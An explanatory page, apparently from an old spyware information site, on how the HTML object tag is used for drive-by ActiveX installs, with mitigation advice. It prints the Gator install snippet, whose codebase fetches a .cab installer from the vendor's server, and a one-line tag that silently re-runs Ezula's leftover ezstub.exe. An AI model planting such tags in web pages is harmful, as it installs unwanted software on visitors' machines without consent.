Spyware :: Information :: Objects




The Object Tag

The object tag is typically used when you want to display multimedia content on the web where your browser may need additional software for it to operate within the browser itself (browser plug-ins or helper applications). The object tag is part of standard html and can be used to insert an object into a web page. The object will most likely be an ActiveX component, an applet, image map or some kind of media player. An object tag might contain an Classid attribute which contains the location of the program on your system. It might also contain codebase attribute which tell the browser where to download the program needed for this plug-in if it's not found on the system. The example below shows how Gator ewallet installs using an ActiveX object;

<object id="IEGator"
classid="CLSID:54e7e082-1da6-412e-96b5-c290fcef5329"
codebase="http://www.gator.com/download/2500/iegator_4032_gatorsetup.cab"
align="baseline"
border="0"
width="400"
height="20">
<param name="params"
value="fcn=setup&src=www.gator.com/download/2500/setup.ex_
&pidel=this&bgcolor=E8F1D0&aic=",aicStr,"&">
<font face=\"verdana,arial,helvetica\" SIZE=\"-1\"><i>Gator Setup failed to start</i></font>
<img src="http://images.gator.com/global/spacer.gif"
width="1" height="1" border="0" alt="" onLoad="checkPlugin( )">
</object>

This is the way most drive-by ActiveX hijackers install by themselves. The CLSID value contains a link to the .dll file which runs the Gator every time Explorer is loaded. If this is not present you can see that the codebase attribute then downloads a .cab (cabinet file) directly from the Gator server. A cabinet file (developed by Microsoft) is a archive file which uses compression to group together one or many files, much like a zip file.

Problems with Objects

Many spyware components that I've seen are quite smart when it come to the uninstall. Many of the spyware programs do appear to remove themselves fully. But under close inspection many leave traces in the registry, and some leave CLSID values. For an example I'm going to use Ezula TopText, it left a CLSID value after I uninstalled it. This Class ID linked to a file called ezstub.exe which automatically sets up ezula TopText again. Any webpage could use this code (shown below) to reinstall Ezula back onto my system;

<object classid='clsid:C03351A4-6755-11D4-8A73-0050DA2EE1BE'></object>

This is enough to execute the file ezstub.exe. The reason this works is because Internet Explorer thinks ezstub is a plug-in of some sort. You can sort this problem by turning off plug-ins in Internet Explorer, or making sure that unwanted CLSID values are not left in the registry.